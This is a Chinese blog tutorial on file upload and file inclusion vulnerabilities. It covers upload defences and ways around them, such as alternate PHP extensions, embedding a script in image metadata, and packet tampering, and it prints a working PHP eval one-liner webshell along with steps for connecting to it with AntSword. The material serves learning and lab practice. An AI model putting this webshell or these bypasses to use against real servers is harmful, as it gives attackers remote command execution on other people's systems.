文件上传漏洞(webshell)和文件包含漏洞

已于 2023-08-09 15:22:17 修改
阅读量909 收藏
点赞数
文章标签: web安全
于 2023-08-08 15:40:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49390750/article/details/132168132
版权

一、防护

1、防护

1、判断文件后缀,为图片的话才让上传成功。
2、解析文件内容(文件幻数)判断文件头和文件尾部是否一致
幻数
常见的
3、隐藏按钮(带上code唯一值)
4、二次渲染(类似拿着你的图片,我再拿手机在你的图片上拍上一张),删除缓存图片
5、文件重命名,避免从客户端拿取更多信息

2、绕过

1、文件后缀不一定非得是php结尾,也可以php5等等

在这里插入图片描述
调用示例
在这里插入图片描述

2、文件头检测(幻数)绕过

存在一种可以将php等等文件转换成png的方法

在这里插入图片描述

或者右键===》属性====》查看详情====》修改版权===》粘贴你的脚本即可(ps:需要在小马基础上加东西)

下面为小马
在这里插入图片描述
实际上存到jpg版权中的为

<?php phpinfo();@eval($_REQUEST[777])?>

注意如果…/路径被过滤了可以使用…/

需要配合其他漏洞比如包含漏洞(比如php页面需要复用其他代码的时候,这个时候路径地址填写图片即可)
使用菜刀连接即可地址为包含php包含漏洞的地址
ps:如果不能菜刀直接连接的话,可以使用图片脚本生成脚本文件来连

在这里插入图片描述

3、隐藏按钮唯一值

抓包拦截修改参数就行

4、二次渲染

最后面的一句话

二、文件上传漏洞

可以通过判断系统上有什么环境,比如php和.net或者java等,上传对应webshell的文件,从而获取服务器一部分权限

webshell获取途径可以从GitHub上找到:::webshell

1、小马(一句话脚本)

需要上传后,使用中国蚁剑(antsword)配合着使用

  1. 打开中国中国蚁剑
    在这里插入图片描述

  2. 右键添加数据 指定对应的小马文件
    在这里插入图片描述

  3. 输入密码
    在这里插入图片描述

  4. 右键点击打开终端
    在这里插入图片描述

2、大马

无需使用中国蚁剑,打开web页面即可有对映执行页面。
在这里插入图片描述
在这里插入图片描述

张航柯
关注
【网络安全漏洞挖掘:文件上传实现Webshell
等风来
09-10 495
接着,我上传webshell.php文件,文件内容为payload,拦截请求包,将文件名修改为jpg,但回显错误,这说明服务器验证了文件的内容。
Webshell文件上传漏洞
野原新之助
11-14 3323
简述: 文件上传漏洞是由于网站对上传的文件没有进行严格筛查,导致用户可以上传一些可执行文件的恶意代码,或webshell,如asp,hph等,然后再通过url访问执行恶意代码,或是通过webshell,达到对网站的控制。 本次在一个靶场题目上进行测试:WebShell文件上传漏洞分析溯源 过程: 界面: 前端检测查看 不属于前端检测 00截断测试 1、创建一句话木马:<?ph...
WEBshell文件上传漏洞
LJH1999ZN的博客
02-19 4830
一、文件上传漏洞的原理 如果web应用程序对上传文件的安全性没有过滤和校验,攻击者可以通过上传webshell恶意文件对服务器进行攻击 。 二、文件上传的原理 1.有文件上传功能 2.上传文件的目录能解析脚本文件 3.能访问到上传的文件 三、文件上传攻击 文件上传防护和绕过手段 1.文件上传漏洞--绕过前端js检测 由于网站客户端对文件的上传类型做了限制,不允许我们上传.php文件,我们可以通过bp抓取发送数据包,然后将数据包做改变即可 ...
WEB漏洞——文件上传
qq_63594215的博客
04-09 1339
MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类,当该扩展名文件被访问的时候,浏览器会自动使用知道应用程序来打开。多用于知道一些客户端自定义的文件名,以及一些媒体文件打开方式。网站允许上传任意文件,然后检查上传文件是否包含Webshell,如果包含删除文件。网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。
SQL注入之webshell上传
最新发布
aihua002的博客
08-05 392
1.高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限,所以该选项为可以=‘“”/=一个路径,不能为NULL,secure_file_priv=“” 代表文件读写没有限制,secure_file_priv=一个路径,代表只能对该路径下文件进行读写,而secure_file_priv=NULL 代表不能对文件进行读写。首先webshell上传就是利用MySQL的文件读写注入而实现,要想上传webshell就得了解文件读写注入的原理。
webshell,文件上传漏洞
weixin_45605313的博客
04-22 1297
webshell
PHP文件包含漏洞利用phpinfo写入webshell
ADummy的博客
02-26 4487
带有PHPINFO的PHP本地文件包含RCE by ADummy 0x00利用路线 ​ 执行exp—>getshell ​ 适用于有本地文件包含漏洞,有phpinfo,怎么写入webshell的情况 0x01漏洞介绍 ​ 在PHP文件包含漏洞中,当我们找不到要触发RCE的有效文件时,如果有PHPINFO可以告诉我们随机生成的临时文件名及其位置,则可能可以包含一个临时文件来利用它来利用它。 启动环境后,可访问http://your-ip:8080/phpinfo.php以取PHPINFO页
文件上传漏洞
m0_75178803的博客
07-26 535
这时攻击者可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(jsp、asp、php、aspx文件后缀)到服务器上,从而访问这些恶意脚本中包含的恶意代码,进行动态解析最终达到执行恶意代码的效果,进一步影响服务器安全。这个恶意的脚本文件,称为WebShell,也可将WebShell脚本称为一种网页后门,WebShell脚本具有非常强大的功能,比如查看服务器目录、服务器中的文件,执行系统命令等。打开题目,题目提示只能上传图像文件,不能上传php文件,那应该是寻找漏洞上传php文件。IIS解析漏洞
墨者 - WebShell文件上传漏洞分析溯源(第2题)
吃肉唐僧的博客
06-30 996
直接上传php文件,发现前端有js校验 核心思路:绕过前端js校验 方法1 试一下,用bp抓包修改后缀绕过,先改文件后缀为jpg 上传成功 直接菜刀无惧链接 方法2 关闭浏览器得js 火狐搜索about:config 搜索java script .enabled,切换为false 上传成功 接下来同样菜刀无惧链接,得控...
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在Web应用程序的上传功能中,攻击者可以通过上传恶意文件来取服务器的...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
墨者学院 - WebShell文件上传漏洞分析溯源(第2题)
多崎巡礼的博客
07-30 890
直接上传php文件 发现前端存在js验证,只能识别图片格式的文件进行上传,这里有两种方法: 第一种是:将一句话木马1.php的后缀名改成.jpg格式的然后进行上传,用burpsuit进行对文件格式改为1.php,上传成功后用菜刀进行链接shell,并找到key. 第二种是:  先在浏览器输入about:config(仅限于火狐浏览器),然后搜索java script .enabled将切...
墨者学院 - WebShell文件上传漏洞分析溯源(第1题)
多崎巡礼的博客
07-26 1568
上传图片成功 上传php失败,即存在过滤 尝试更改php版本 上传成功 得到key
文件包含漏洞webshell
weixin_51692662的博客
08-20 910
文件包含漏洞webshell
web漏洞——文件上传漏洞(upload-labs)
net的博客
02-25 3463
由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。文件上传漏洞本身就是一个危害巨大的漏洞WebShell更是将这种漏洞利用无限扩大。大多数的。
文件包含漏洞
jiangliuzheng的专栏
09-01 9376
1、什么是文件包含漏洞 文件包含,包括本地文件包含(Locao file inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种形式。 首先,本地文件包含就是通过浏览器引进(包含)Web服务器上的文件,这种漏洞一般发生在浏览器包含文件时没有进行严格的过滤,允许遍历目录的字符注入浏览器并执行(比如:asp?file=index.html)。 其次,
webshell文件上传漏洞
zjdda的博客
05-30 1268
简要描述了webshell的原理、一句话木马的原理、上传漏洞的原理和绕过以及防御的方法
web安全-7-文件上传文件包含漏洞
qq_57410330的博客
04-07 1124
内容为文件上传漏洞文件包含漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

张航柯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值